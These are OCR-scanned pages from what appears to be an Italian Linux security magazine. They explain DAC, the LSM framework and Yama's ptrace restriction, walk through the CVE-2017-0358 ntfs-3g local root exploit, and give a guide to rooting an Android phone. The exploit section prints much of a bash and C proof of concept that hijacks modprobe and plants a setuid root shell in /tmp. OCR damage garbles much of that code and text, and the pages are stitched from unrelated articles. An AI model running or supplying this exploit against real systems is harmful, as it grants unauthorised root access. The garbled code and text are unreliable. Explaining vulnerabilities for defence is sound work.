[ ] Pin load of kernel files (modules, fw, etc) to one filesystem 


[ ]} Integrity subsystem. 
Default security module (SELinux) 


<Select> 


< Exit > 


4.9.7-201.fc25.x86_64 : make 


< Help > 


---> 


< Save > < Load > 


® Fig. 1 * Sezione Security options dal comando make menuconfig 


XCOS'È IL DAC? 


Acronimo di Discretional Access Control, il DAC è nato e si 
è sviluppato con i sistemi UNIX e adottato in toto dai siste- 
mi GNU/Linux. Poiché nei sistemi UNIX/UNIX-like tutto è 
un file, ecco che il DAC è definito da un insieme di autoriz- 
zazioni (permessi) attraverso le quali è possibile effettuare il 
controllo dell’accesso ai file ovvero la capacità di assegnare, 
ad opera dell’amministratore di sistema e in limitata parte an- 
che dall’utente “normale”, i permessi di esecuzione, lettura e/o 
scrittura. Il comando Is -l (man Is) impartito nella nostra home 
utente elencherà file e directory in essa presenti. Soffermiamo 
la nostra attenzione sulla prima colonna (Fig. 2) che è possibile 
dividere in 4 sezioni. La prima sezione riporta il tipo di file: 
il carattere “-” indica un file normale, la “d” una directory, 
“c” un dispositivo a caratteri, “b” un dispositivo a blocchi e 
“I° un collegamento simbolico. La parte restante contiene le 
autorizzazioni, raggruppate in 3 sezioni: l’utente proprietario 


del file, il gruppo di appartenenza di cui possono farne parte 
uno o più utenti, e tutti gli altri ovvero utenti che non sono 
né il proprietario del file e non fanno parte del suo gruppo di 
appartenenza. In ognuna delle 3 sezioni può apparire la lettera 
“r” ad indicare che il file è leggibile, “w” il file è scrivibile, 
“x” il file è eseguibile e “-” ad indicare che il dato permesso 
non è stato impostato. Nell'esempio in Fig. 2 abbiamo un file 
regolare il cui utente proprietario può leggere e scrivere (modi- 
ficare) il file, gli utenti appartenenti al gruppo possono soltan- 
to leggerlo così come tutti gli altri. Ogni permesso corrisponde 
ad uno specifico bit di una variabile che viene mantenuta in 
una struttura nota con il nome di inode: assegnare/modificare 
un permesso significa modificare il bit specifico presente nella 
struttura. Permessi di file e directory possono essere modificati 
con il comando chmod (man chmod), per cambiare proprie- 
tario e gruppo si usano rispettivamente chown (man chown) 


e chgrp (man chgrp) infine per gli attributi speciali, funzione 
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ILE 
-TW-T--f-- 


® Fig. 2 * SLe 4 parti della prima colonna dell’output del comando ls 


anche del file system in uso, si utilizza chattr (man chattr). 
Alcuni file eseguibili possono avere una “s” al posto della “x” 
ad indicare che è attivo il bit setuid (Set User ID). Questo si- 
gnifica che quando lanciamo quel dato programma esso verrà 
eseguito con i privilegi dell’utente di appartenenza. 

In tale ottica ricordiamo che il kernel assegna degli identifica- 
tori unici ad ogni utente, oltre a UID (User ID) e GID (Group 
ID) vengono utilizzate altre due coppie di identificatori: gli ID 
effettivi EUID (Effective User ID) e EGID (Effective Group 
ID) e gli ID reali RUID (Real User ID) e RGID (Real Group 
ID). Quando viene eseguito un programma con bit suid attiva- 
to l’utente che lo ha lanciato assumerà 1’ EUID (o Vl’ EGID se 
è attivo il sgid, Set Group ID) del proprietario del file, ma il 
kernel è sempre in grado di identificare chi ha fatto la richie- 
sta poiché i valori RUID e RGID non cambiano e identificano 
univocamente l’utente. Al valore degli identificatori possiamo 
risalire utilizzando il comando id (man id). Ma perché questo 
apparente complicato meccanismo sul controllo degli acces- 
si? Poiché GNU/Linux è un sistema multi-utente non si può 
escludere che più utenti possano lavorare, anche in contem- 
poranea, sulla macchina. Grazie al sistema DAC l’utente X, 
in funzione dei permessi impostati, non può modificare i file 
dell’utente Y. In sostanza non si possono arrecare danni ad altri 
utenti e, soprattutto, al sistema nel suo complesso. Osserviamo 
però come nel modello DAC la decisione sulla sicurezza sia a 
discrezione dell’utente ed è basata solo sull’identità sulla pro- 
prietà dell'oggetto, ad esempio un file o una cartella. Non c’è 
nessun’altra protezione. 


cooo 
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Permessi gruppo 


Permessi “altri” 


LA STRUTTURA LSM 


La sicurezza in informatica è quella disciplina da adottare al 
fine di proteggere la propria organizzazione/azienda attuando 
apposite misure atte a contrastare eventi accidentali o intenzio- 
nali che possono produrre una compromissione parziale o to- 
tale dei dati e/o del sistema. Così definita è assolutamente ge- 
nerica e può spaziare dalla sicurezza fisica della macchina alla 
sua continuità di servizio, dalla privacy all’integrità dei dati, 
laddove ogni singolo argomento porta con se un importante 
numero di possibili soluzioni. Ad esempio, solo per la prima 
voce: alimentatori ridondanti, adozione del RAID e possibile 
scelta del clustering. Allora rendere “sicuro” un sistema è un 
percorso lungo e complicato poiché coinvolge diversi aspetti 
dello scibile informatico. Quanto detto vale anche al livello 
software laddove l’introduzione continua di nuove caratteri- 
stiche, che nella pratica implica l’aggiunta di nuove righe di 
codice, nonché l’uso più massiccio, rispetto ad un recente pas- 
sato, di un certo tipo di software (si pensi ai vari CMS come 
Wordpress e Joomla) ad opera di un numero sempre più cre- 
scente di persone, porta a un problema cronico di sicurezza 
anche per sistemi GNU/Linux, come dimostra il flusso con- 
tinuo di vulnerabilità di sicurezza. Rimanendo nella zona di 
competenza del kernel vediamo qual è la misura adottata per 
permettere l’inserimento dei diversi metodi di protezione. Ri- 
cerche sulla sicurezza hanno prodotto diversi metodi sul con- 
trollo degli accessi che vanno sicuramente nella direzione di 
una maggiore sicurezza offerta al sistema, tuttavia non c’è un 
unanime consenso su quale possa essere la soluzione migliore. 
Non solo, anche ipotizzando di poter implementare tutti i vari 
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Kemel Space 
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(*) Ritoma il risultato della chiamata di sistema 


® Fig. 3 » Controlli attuati dal kernel {DAC+LSM): principio 
di funzionamento 


meccanismi di controllo occorre, come da esplicita richiesta di 
Linus Torvalds, che: 


e Nonsi faccia alcun favoritismo a questa o quella società 
di sicurezza; 


e L'interfaccia deve essere concettualmente semplice, poco 
invasiva e efficiente; 


e Possa essere facilmente integrato senza dover stravolgere 
la struttura del kernel e il “classico” controllo DAC dovrà 
continuare ad essere verificato. 


Per questi motivi a partire dalla versione 2.6 del kernel ven- 
ne introdotto il framework LSM (Linux Security Modules). 
Come visibile in Fig. 3, LSM offre un’interfaccia attraverso 
la quale è possibile implementare nuove politiche di sicurezza 
lato kernel e utilizzando gli specifici tool di controllo e confi- 


\ gurazione in user space (lato utente). 


La filosofia ad alto livello, senza entrare nei dettagli implemen- 
tativi a basso livello (livello di codice) che esulano da questo 
contesto, vede un processo utente eseguire, previo uso di speci- 
fiche librerie, la chiamata di sistema. A questo livello, dall’al- 
tra parte dell’interfaccia in kernel space, i dati user space, ad 
esempio un nome di percorso, devono essere ancora tradotti 
nell’oggetto kernel che li rappresenta come ad esempio un ino- 
de, pertanto viene processata prima questa richiesta. A questo 
punto, dopo aver eseguito un controllo degli errori, se non viene 
riscontrato alcun problema la palla passa al DAC. Se l’utente 
che ha fatto la richiesta non ha i giusti permessi viene negata 
l’azione (che potrebbe essere la lettura di un file) altrimenti 
viene concesso il permesso ma prima di intraprendere l’azione 
richiesta viene effettuato un altro controllo attraverso l’inter- 
faccia LSM che chiede al modulo in uso se la richiesta, in base 
alla configurazione, risulti essere o meno lecita. Solo a questo 
punto si ha la risposta definitiva. In buona sostanza una richie- 
sta può superare il DAC ma non è detto che superi la politica 
di sicurezza attivata via LSM, ma se non supera il DAC a LSM 
non ci arriva nemmeno! 


COS'È UNA SYSCALL 


In GNU/Linux l’accesso alle risorse di sistema non avviene in 
modo diretto, vengono utilizzate apposite interfacce che agi- 
scono tra due livelli: in alto chi fa la richiesta e in basso l’in- 
terazione con l’hardware sia essa la CPU piuttosto che i dischi 
o le varie schede. Si viene così a creare un modello stratificato 
che aumenta la sicurezza semplicemente perché il controllo ad 
una data richiesta, ad opera di un programma lato utente, e che 
quindi gira in user space, deve gioco forza passare attraverso il 
kernel il quale potrà certificarne la regolarità o meno. Una stra- 
tificazione di questo tipo assicura anche una buona portabilità, 
infatti in questo modo si possono eseguire le medesime applica- 
zioni anche su kernel di versioni differenti a patto che le inter- 
facce rimangano le stesse. Sul bordo dell’interfaccia possiamo 
così definire due attori: le API (Application Programming 
Interface) e le system call (syscall o chiamate di sistema) ov- 
vero le entry point che il programmatore ha a disposizione per 
comunicare con il kernel. Al livello più alto abbiamo le API le 
quali definiscono delle funzioni attraverso le quali è possibile 
richiedere e ottenere un servizio. Nei sistemi UNIX, ogni sy- 
stem call corrisponde ad una funzione di libreria C: il program- 
matore chiama la-funzione, utilizzando la sequenza di chiamata 
standard del C, e la funzione, in maniera trasparente all’utente, 
invoca il servizio del sistema operativo nel modo più opportu- 
no. Non tutte le funzioni associate alle API, però, invocano una 
chiamata di sistema: ad esempio, la funzione C printf() può 
invocare la system call write() ma la funzione C strepy() per la 
copia delle stringhe o la funzione atoi() per la conversione da 
ASCII a intero, non ne coinvolgono alcuna. 

Non è necessario comprendere i meccanismi a basso livello che 
scaturiscono da una chiamata di sistema: in Fig. 4 vediamo la 
dinamica di principio. L'applicazione utente richiede, ad esem- 
pio, la lettura di un file previo uso della funzione read() della 
libreria C per la chiamata in user space. A questo punto la li- 
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ggigiorno le varie distribuzioni, in particolar modo 

quelle dedicate al “grande pubblico”, giungono agli 

utenti con kernel tali da dover soddisfare le esigen- 
ze di una variegata platea: si pensi, ad esempio, al numero e 
tipo di periferiche che un utente medio desktop può utilizzare. 
Molto probabilmente saranno diverse da quelle utilizzate da un 
altro utente GNU/Linux in un'altra parte del mondo. Trattasi 
di kernel nei quali vengono abilitate un’infinità di opzioni che 
faranno parte o dell’immagine statica del kernel — ovvero del 
blocco “monolitico” caricato in fase di avvio - o come mo- 
duli caricabili a run-time e presenti in /lib/modules/""uname 
«r". Le funzioni abilitate, così come un certo numero di driver 
caricati o da poter caricare con il comando modprobe nome_ 
modulo, in buona percentuale dei casi risulteranno totalmente 
inutili e ancor di più se pensiamo ad un server per il quale non 
è necessario che il sistema risulti user-friendly (amichevole), 
ciò che conta è la sicurezza e la stabilità del sistema, sia lato 
kernel così come nel software installato. 


SICUREZZA E KERNEL 


Se vogliamo raggiungere un buon grado di sicurezza, ancor 


di più se la macchina è un server, occorre sapersi costruire 
un kernel ad-hoc specifico per quella macchina attivando solo 


WERE ASEM OE DONNIE II IAA 
IL KERNEL È TUO AMICO! 
Ecco quali sono i moduli affini 


Coloro i quali volessero un promemoria sugli argomenti 
fin qui affrontati per quella specifica sezione del kernel, 
ricordiamo SELinux, AppArmor e Tomoyo. Alla lista 
aggiungiamo, anche se non fa parte della sezione indicata, 
LKM [Loadable Kernel Module) per i moduli caricabili a 
run-time sui root-kit in kernel space. 


coeso 
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UNA CHIAMATA 
POTENZIALMENTE 
INSIGURA 


Forse non lo sai, ma il kernel del Pinguino ti aiuta 
a tracciare ogni chiamata di sistema. Il tutto, 
grazie alla funzione Yama. Ecco come utilizzarla 


ciò che realmente ci occorre, secondo la ben nota metafora, 
tutto quello che non c'è, non si può rompere! Non si può che 
concordare fosse solo per un motivo logico. Ad esempio, che 
senso avrebbe attivare il supporto audio per un server che non 
ne farà mai uso? O ancora il supporto per i joystick o per un 
dato file system non in uso o periferiche SCSI non utilizzate? 
Per ottenere un risultato mirato occorre saper scaricare, ap- 
plicare eventuali patch, configurare, (ri)compilare, e installare 
un kernel partendo dai sorgenti. Operazioni, queste, che pos- 
sono incutere un po' di timore, ma dal punto di vista pratico 
si risolvono nel lanciare un certo numero di comandi che in 
questa sede esulano dal contesto. Molto più difficile, invece, 
è il tuning delle singole voci del kernel, di quello che ci oc- 
corre realmente, poiché le opzioni selezionabili oramai hanno 
raggiunto le svariate centinaia. Poiché il compito di una rivista 
è fornire le basi su alcuni concetti e/o aspetti di un dato argo- 
mento — sarà poi cura del lettore approfondire con l’acquisto di 
libri dedicati qualora interessato -, proseguiamo l’analisi della 
sezione Security options del kernel, analizzata diverse volte 
per alcune delle voci che la popolano. 

Questa volta è il turno di Yama, opzione evidenziata in Fig. 1. 
Dall'help in linea, la descrizione riporta, traducendo in Italiano 
le parti di interesse: “Questa opzione seleziona l’opzione Yama 
la quale estende il supporto DAC dei sistemi GNU/Linux [...]. 
Attualmente la funzione disponibile è la restrizione della visi- 
bilità della syscall ptrace [...]. Analogamente alle altre funzio- 
nalità, anche le funzioni di Yama sono accessibili via LSM”. 
Per capire cosa fa e come funziona questa opzione del kernel 
nonché qual è lo scopo che si prefigge, 3 sono le parti sulle 
quali concentrare l’attenzione che esamineremo nel seguito: 


e Estendeil supporto DAC con ulteriori impostazioni di sicurezza 
a livello di sistema; 

e L'opzione di sicurezza va ad affiancare gli altri moduli grazie a 
LSM; 

e Disabilitao limita la visibilità della chiamata di sistema ptrace. 


come patch al kernel ad opera di Kees Cook dell’ Ubuntu Se- 
curity Team, ma solo nel Maggio 2012 è stata ufficializzata 
con il rilascio del kernel 3.4.0. Concettualmente la funzione è 
semplice: mentre le altre soluzioni che si appoggiano a LSM, 
come AppArmor, Tomoyo e SELinux, fanno da supplemen- 
to al DAC implementando un controllo di accesso vincolato 
(MAC - Mandatory Access Control), nel caso di Yama la 
funzione è limitare la visibilità alla syscall ptrace (Process 
Trace) salita agli onori delle cronache per un problema legato 
all’installazione dell’ambiente di sviluppo video-ludico Unity 
5 (https://unity3d.com/).Il framework viene rilasciato solo per 
sistemi Microsoft Windows e Mac OS, ma produce giochi che 
possono girare su svariati sistemi operativi compresi Android 
e GNU/Linux, ma è pienamente supportato da WINE (Www. 
winehq.org). Chi tentava l’installazione miseramente falliva se 
una specifica flag era impostata a 1 e il cui valore può essere 
determinato con i comandi sysctl kernel.yama.ptrace_scope 
o cat /proc/sys/kernel/yama/ptrace_scope laddove il suppor- 
to a Yama sia stato abilitato nel kernel. Infatti alcune distribu- 
zioni, come OpenSUSE, lasciano disabilitata questa voce altre, 
come Fedora, la abilitano di default. Ma perché tutto questo 
“rumore” attorno ad una chiamata di sistema? 


TRACCIAMENTO DEI PROCESSI 


Quando si crea un programma, anche il più banale, chi lo svi- 
luppa dopo aver scritto le usuali righe di codice passa — se 
utilizza il linguaggio C — alla fase di compilazione che termina 
con un file eseguibile. Tale eseguibile diventa un processo nel 
momento in cui viene mandato in esecuzione. Non è sufficien- 
te, però, creare l’eseguibile e lanciarlo. Esiste una fase succes- 
siva tanto più difficile quanto più complesso è il programma 
nota con il nome di debugging: una diagnostica sul programma 
(quindi sul processo) lanciato ad opera di un altro programma 
(quindi di un altro processo) con lo scopo di trovare errori che 
non inficiano il funzionamento del programma in se, quanto 
la sicurezza dello stesso sul sistema. Poiché la comunicazio- 
ne tra processi (IPC, Inter-Process Communication) avviene 
per mezzo delle chiamate di sistema, ecco che il “back-end” di 
un debugger come gdb (www.sourceware.org/gdb) è proprio 
una chiamata di sistema e nello specifico è proprio la chiamata 
ptrace()! Dov'è la pericolosità della syscall ptrace()? Per vi- 
sualizzare il problema dobbiamo vedere come opera: ptrace() 
fornisce un mezzo ad un processo, che chiameremo traccian- 
te, attraverso il quale può osservare e controllare l’esecuzio- 
ne di un altro processo, che chiameremo tracciato, del quale 
può esaminarne e cambiarne anche la memoria e i registri! Un 
comportamento decisamente intrusivo poiché un singolo uten- 
te può esaminare la memoria e lo stato di esecuzione di uno dei 
vari processi. Ad esempio se un programma — a causa di un bug 
ancora non corretto - è stato compromesso sarebbe possibile 
per un utente malintenzionato collegarsi ad altri processi in 
esecuzione, il browser Firefox o una sessione SSH, estraendo 
così alcune credenziali e nessuno potrà fermarlo perché poi 
potrà passare a esaminare un altro processo per rubare altre 
credenziali e così via a seguire. Il problema non era solo te- 


orico poiché diversi attacchi già esistevano quando la patch è 
stata proposta e sono tutt'oggi reali se si permette a ptrace() di 
operare “indisturbata”. Per tirare le conclusioni, poiché ptra- 
ce() abilita un processo a controllarne l'esecuzione di un altro, 
l’uso pratico dovrebbe essere riservato a sviluppatori software 
(per il debugging) e più raramente a qualche amministratore 
di sistema, in tutti gli altri casi è meglio disabilitarla o quanto 
meno “depotenziarla”. Nel paragrafo precedente abbiamo visto 
come valutarne il valore che può essere compreso tra 0 e 3, più 
precisamente: 


e 0tipico modo di lavorare di ptrace: tutti i processi aventi 
lo stesso UID possono essere debuggati; 


e 1soloil processo genitore può eseguire il debug; 


e 2 solo l’amministratore di sistema può utilizzare ptra- 
ce come richiesto dalla capability CAP_SYS_PTRACE 
(man 7 capabilities); 


e 3 nessun processo può essere tracciato con ptrace. 


I valori da assegnare sono funzione di ciò che si vuole proteg- 
gere: ad esempio, in un sistema con dati altamente sensibili 
non ha alcun senso mantenere il comportamento di default per- 
tanto si può impostare un valore pari 3. Su un sistema desktop, 
a seconda degli usi, si possono impostare i valori 2, 1 o 0. Per 
cambiare il valore è sufficiente utilizzare, con le credenziali 
dell’amministratore, il comando: 


echo "x" | tee /proc/sys/kernel/yama/ptrace_ scope 
oppure, per chi usa sudo: 


echo "X" | sudo tee /proc/sys/kernel/yama 
/ptrace scope 


dove X è uno dei 4 valori di cui sopra. 

Per concludere, si intuisce la complessità che si cela dietro 
un argomento che coinvolge apparentemente una singola voce: 
un mare di considerazioni per dire che è il caso di disabilitare 
questa syscall laddove non utile! 
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"Windows è un pericolo!" 


Su GNU/Linux è possibile montare partizioni Windows usando il modulo 
FUSE NTFS-3G. Ma un bug, che permette l'esecuzione di un terminale con privilegi 
di root, trasforma un semplice utente in amministratore 


er quanto un utente GNU/Linux pos- 
p sa volersi mantenere lontano dalle 
tecnologie basate su Windows, finirà 
sempre per doverci fare i conti, prima o poi. 
Ad esempio, ciascuno di noi ha qualche ami- 
co che usa Windows e che utilizza delle pen- 
drive per passarci dei file importanti. Uno dei 
file system più diffusi è FAT, ma è ormai dav- 
vero molto diffuso sia per hard disk esterni 
che per pendrive di dimensioni superiori a 32 
GB il file system NTFS. È probabilmente per 
questo motivo che uno degli strumenti pro- 
venienti dall'universo Microsoft più popolari 
nel mondo GNU/Linux è NTFS-8G, il modulo 
FUSE che permette l’accesso ai dispositivi 
di memorizzazione formattati con NTFS. II 
meccanismo di FUSE è molto intelligente, 
perché lavorando nello userspace invece che 
nel kernelspace permette il montaggio di file 
system anche agli utenti comuni e non solo 
all’utente root. Si tratta, quindi, di un sistema 
più sicuro, ed anche molto più flessibile visto 
che si possono inventare file system virtuali 
di qualsiasi tipo. Tuttavia, il modulo fuse del 
kernel Linux deve essere caricato. 


UN'AZIONE INUTILE 


Sui sistemi dotati di NTFS-3G viene for- 
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nito un programma, solitamente proprio 
/bin/ntfs-3g, che permette l’utilizzo di 
dispositivi formattati con NTFS. E sic- 
come per montarli sul proprio sistema è 
necessario che FUSE sia abilitato, il pro- 
gramma provvede a caricare tale modulo 
di sistema chiamando il comando mod- 
probe (lo stesso, per capirci, che si usa 
per caricare qualsiasi altro modulo di si- 
stema come quelli per i driver delle peri- 
feriche). Il fatto è che questa operazione 
è nella maggioranza dei casi inutile: oggi 
come oggi, tutte le distribuzioni che sup- 
portano NTFS-3G hanno il modulo FUSE 
già caricato nel kernel. Insomma, sareb- 
be sufficiente controllare se il modulo sia 
caricato e, in caso contrario, rifiutarsi di 
avviare il montaggio della partizione NT. 
Ma il vero problema è che non soltan- 
to questa operazione è inutile, ma an- 
che pericolosa. Proprio perché non era 
previsto che questi strumenti venissero 
usati in questo modo, non era garanti- 
to che funzionassero correttamente. Ed 
infatti c'è un piccolo intoppo nel mec- 
canismo: il programma che si occupa 
di NTFS-3G viene eseguito con privilegi 
di utente semplice, ma se questi vuole 
a sua volta caricare il modulo fuse nel 


kernel usando il comando modprobe, 
avrà bisogno di privilegi di amministra- 
zione. Quindi, il programma usa setuid, 
il meccanismo che permette a specifici 
programmi considerati “affidabili” di po- 
ter eseguire azioni di root anche quando 
avviati con i privilegi di utenti normali. Il 
comando modprobe non è progettato 
per essere eseguito da setuid, ma sol- 
tanto dal vero utente root, ed utilizza 
una variabile d'ambiente per memorizza- 
re delle opzioni da eseguire assieme al 
comando. Questo significa che un ma- 
lintenzionato potrebbe modificare tale 
variabile nell'ambiente dell'utente “sem- 
plice”, e poi avviare ntfs-3g forzando il 
caricamento del modulo fuse con mod- 
probe, andando quindi ad eseguire ciò 
che vuole con privilegi di root (cioè quelli 
concessi a modprobe grazie a setuid). È 
quindi possibile ottenere di fatto i privi- 
legi di amministrazione, però ricordiamo 
che non è un problema di modprobe: è 
un problema di ntfs-3g, che utilizza mo- 
dprobe in modo improprio. 


L'EXPLOIT 


Per capire meglio come si possa sfruttare 


questo bug, vediamo un semplice exploit 
presentato dai ricercatori di Project Zero: 


#!/bin/bash 


echo "[*] Gathering environment info ... 


cwd="$ (pwd) " 

un="$ (uname -r)" 

dlm="$ (pwd) /l1ib/modules" 
dkf="$ (pwd) /kernel/fs" 


Prima di tutto il pirata ha bisogno di cono- 
scere l’ambiente in cui si sta eseguendo lo 
script, in particolare per quanto riguarda 
la versione attuale del kernel e la cartella 
in cui è aperto il terminale al momento. 


echo "[*] Creating kernel hijack 
directori 
mkdir -p "${dlm}" 
mkdir -p "${dk£}" 
echo "[*] Forging symlinks .,." 
"${cwd}" "${alm}/${un}" 
"s{cwd}" "s{akf}/£ 


cve_2017 0358.ko fus 


Conoscendo queste informazioni, diventa 
possibile creare dei link simbolici al modulo 
fuse, così da caricare non l'originale ma il 
link nel kernel usando modprobe. 


echo "[*] Pulling in deps ... " 
echo "[*] Building kernel module ... 
cat << 'EOF' > cve 2017 0358.c 


#include: <linux/module.h> 


Sfruttando cat è possibile ora scrivere un file 
sul disco contenente un programma C che 
rappresenterà un finto modulo da caricare 
nel kernel per permettere al pirata di esegui- 
re il codice che vuole. 


MODULE DESCRIPTION("POC for CVE-2017 
-0358 from Google Project Zero"); 
int init module (void) { 
printk(KERN_INFO "[!] Exploited 
7-0358 successfully 


to patch your s 


Se si è arrivati a questo punto, è ovvio che 
l'attacco abbia funzionato, quindi il sistema è 
vulnerabile e si avvisa l’utente della necessità 
di aggiornare. 


char *envp[] = { "HOME=/tmp", NULL }; 
char *argv[] = { "/bin/sh", "-c" 


"/bin/cp /bin/sh /tmp/r00t; /bin/ 


chmod u+s. /tmp/r00t" 


char *argvv[] = { "/bin/sh", "-c" 
"/sbin/rmmod cve_ 2017 0358", NULL }; 
v[0], argvv 


return 0; 


Infatti, è possibile preparare una serie di 
stringhe che contengono il necessario per 
lanciare un terminale /bin/sh. Infatti, l’esegui- 
bile di questo terminale viene copiato nella 
posizione /tmp/rO0t e gli viene impostato il 
suid (chmod u+s), che garantisce all'utente 
attuale i priivlegi del proprietario di tale file 
(che è ovviamente root). 


(void) { 
printk(KERN_ INFO "[*] CVE-2017-0358 


exploit unloading ...\ 


void cleanup_mod 


} 
EOF 


Il modulo per l’exploit si chiude con una fun- 
zione che segnala la disattivazione del mo- 
dulo del kernel. 


odule 


/ 
-r) /buil 
r)/bulla 


È ovviamente necessario un Makefile per 
compilare agevolmente il modulo del kernel 
appena scritto. 


make 1>/dev/null 2>/dev/null || echo "[-] 
FAILED: your need make / build tools" 


cp "/lib/modu 


La compilazione viene avviata proprio con 
make, inviando l'output a /dev/null, così non 
riempie il terminale. 


dev/null 


Ora si può impostare la variabile d’ambien- 


te. modbprobe options, che contiene le 
opzioni con cui lanciare modprobe. Da no- 
tare che questa variabile è stata impostata 
nell'ambiente attuale, cioè quello dell'utente 
“semplice”, che è quello che sta eseguen- 
do lo script bash. La variabile, tuttavia, per- 
mette di dirottare l'esecuzione di modprobe 
sul modulo di sistema che è appena stato 
scritto (modificando la cartella in cui cercare i 
moduli con l'opzione -d), invece che sul vero 
e proprio modulo fuse “originale” quando il 
programma ntfs-3g lo richiede. 


/tmp/r00t -c 'whoami' | egrep -q 'root' 


&& echo "[+] SUCCESS: You have foot. 


Don't be evil :) 


Infine, lo script verifica se sia possibile ac- 
cedere al terminale /tmp/r00t con privilegi di 
amministrazione, e poi lancia proprio questo 
terminale offrendo al pirata una riga di co- 
mando eseguita come utente root (che è il 
proprietario del programma). 


LA SOLUZIONE 


Il bug è presente nelle versioni di ntfs-3g 
fornite nella maggioranza delle principali di- 
stro GNU/Linux, da Debian ad Ubuntu ma 
anche Gentoo, Red Hat, SuSE, e Mageia. AI 
momento in cui scriviamo il bug è già stato 
corretto, perché è stato scoperto dai ricer- 
catori del Project Zero di Google, i quali se- 
gnalano il bug in via riservata agli sviluppatori 
del software e lo rendono pubblico soltanto 
90 giorni dopo, proprio per dare ai program- 
matori il tempo di realizzare una patch prima 
che l’exploit diventi di dominio pubblico. E 
tre mesi sono stati più che sufficienti, visto 
che gli sviluppatori di NTFS-3G hanno prov- 
veduto immediatamente a correggere il pro- 
gramma togliendo l’inutile e pericolosa azio- 
ne. Ovviamente, è fondamentale aggiornare 
immediatamente il proprio sistema operativo 
almeno con i “security updates”. 


CVE-2017-0358 


II Fig. 1 © Il bug colpisce molte distro, ma è 
già stato corretto nelle ultime versioni 
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GOOGLE ASSISTANT 


UL TUO TELEFONINO! 


Ecco la procedura che ti permette di installare il nuovo assistente virtuale 
di Big G su qualsiasi smartphone o tablet Android 


oogle Assistant è l’assistente personale intelligente che Big G 
(È integrato nei nuovi smartphone Google Pixel. Si tratta di 

un’estensione di Google Now che non si limita a semplici co- 
mandi vocali, ma offre un’interazione tra utente e telefonino molto più 
avanzata, un po’ come fa Siri su i0S. Possiamo chiedere a Google Assi- 
stant un po” di tutto: trovare un posto specifico, controllare lo stato di un 
volo, creare un promemoria e molto altro ancora. L'assistente personale 
intelligente, al momento, può essere utilizzata solo sui nuovi dispositivi 


Tutto il necessario... 


Google Pixel. Abbiamo però scovato un modo per installarlo su qualsiasi 
dispositivo Android 7.0 Nougat. Affinché tutto vada per il verso giusto è 
necessario che sul PC siano installati i tool Google dedicati ad Android: 
ADB, Fastboot and Driver facilmente reperibili sul Web. Inoltre, sul de- 
vice Android devono essere attivate le opzioni sviluppatore: per farlo, 
spostiamoci in Impostazioni + Info sul telefono e da qui tocchiamo 
ripetutamente Numero build. Fatto ciò, spostiamoci nel nuovo menu 
Opzioni sviluppatore e abilitiamo Sblocco OEM e Debug USB. 


Sblocchiamo il device ed abilitiamo i permessi di root 


PRODUCT_NAME - bullhead 

VARIANT - bullhead LGH791 16GB 

Hi VERSION - rew_1,0 

BOOTLOADER VERSION - BHZ11f 

BASEBAND VERSION - M8994F-2,6,33,2,14 


CARRIER INFO - N7A 
SERIAL NUMBER - 0146683eb3b7a2a5 
SIGNING - production 


Da terminale e con il device collegato al PC, 

lanciamo fastboot devices seguito da fastboot 
oem unlock. Questo permetterà lo sblocco del Bootloader 
e cancellerà tutti i file presenti sul dispositivo. Riavviamo 
con fastboot reboot. 


Ritorniamo al terminale e, dopo essere entrati 

nella directory adb, lanciamo il comando adb 
reboot bootloader per riavviare il device nella modalità 
Bootloader. A questo punto digitiamo fastboot flash reco- 
very seguito da nome del file della TWRP. 


3088 
ce0s 
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SuperSU | 


manages your Root Permissions 


It's up to you! 


È 

È 

! 

+ DOWNLOAD È 
Update: 2016.9.1 V2.78 È 


P. 
peer ramarri on pas spanna 


Raggiungiamo il sito Web https://dlL.twrp.me 

e scarichiamo l’ultima versione di TWRP per il 
nostro dispositivo. Scarichiamo quindi l'ultima versione 
di SuperSU da www.supersu.com. Si tratta di un file da 
copiare nella memoria del device. 


(a9) Team Win Recovery Project 


Quando la copia 
sarà ultimata, afferriamo 
il device e, da spento, pre- 
miamo i tasti volume giù e 
accensione. Nel menu che 
appare, con i tasti volu- 
me scegliamo Recovery 
mode e premiamo il tasto 
di accensione. Tocchiamo 
Install e installiamo il 
file SuperSU copiato in 
precedenza. 


Zi ndroia c o r nuoee 


Un assistente virtuale nel tuo smartphone 


Entriamo nel vivo dell’azione: installiamo Google Assistant ed iniziamo ad usarlo 


Root Checker Basic 


< in 


VERIFICA ROOT. AGGIORNAMENTI | GLOBAL — BASID È 


pr led on this device 
Di us 5X 
Versione di Android: 7.0 


Advanced Root Checker 

Aggiunge: Guida/Feedback, rilevamento 
% file binario e versione Superuser e SUe 

rilevamento utente root shell ADB 


UN PRIMO 
07 contRroLLo 

Ora, è sufficiente 
riavviare il dispositivo per 
ritrovarselo con i permessi 
sscona | diroot abilitati. 
Gissi LE esa Di Pat Ser l Per verificare se la pro- 
d Se I | ceduraèstata eseguita 
Meet e corus È  COrrettamente, possiamo 
installare dal Play Store 
l'app Root Checker che 
serve appunto a verifica- 
re che il dispositivo sia 
rootato. 


Advanced Root Checker ai 
Feedback Mode: Install Root 


"ip Amazon App 


CPU: 28 °C 


1:03 PM Batteria: 82%+ 


Installa Zip 
Seleziona il file da Archivio interno (9044 MB) 
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d Nome Dimensione 


(Livello superiore) 


COME UN PIXEL 

Copiato il file nella memoria del device, ri- 

avviamo il dispositivo nella Recovery TWRP. 
Tocchiamo Installa e flashiamo prima il file Google- 
AssistantVelvet.zip. Successivamente, GoogleAssi- 
stantBuildProp.zip. Al termine, cancelliamo la cache e 
riavviamo il telefonino. 


Here you go 


Hotel Il Focolare 
AKkXk: 350.0m 


3-star hotel Inn 


Locanda San Tomaso 
250.0m 
Bed & Breakfast 


aiar 


downloads for È 
-Android- Generic Device/Other 
by FaserF 


home / -Android- / Generic Device/Other / FaserF 


è Sort 


O folders, 3 files 


root / Google Pixel Experience / Googie Assistant 


| FILE DELL'INGANNO 
02 Raggiungiamo la pagina www.edmaster.it/ 
url/6573 e clicchiamo Download per scaricare 
i file GoogleAssistantBuildProp.zip e tweak.prop. 
A download terminato, copiamo questi file nella memo- 
ria del nostro dispositivo. 


Meet your Google Assistant. 


Ask it questions. Tell it to do things. It's your own 
personal Google, always ready to help. 


To get help from your assistant 
Say "Ok Google" or touch & hold the Home button. 


CAMBIAMO LA LINGUA 
0 Al momento, la versione di Google Assistant 
che abbiamo installato non è disponibile in ita- 
liano. Per usarlo dovremo cambiare la lingua al nostro 
dispositivo: spostiamoci nel menu principale di Android 
e da qui tappiamo su Impostazioni; selezioniamo quindi 


la lingua Inglese. 

05 Possiamo avviare il nostro assistente perso- 

nale pronunciando 0k Google o tenendo pre- 

muto il tasto Home. Al primo avvio dovremo configura- 
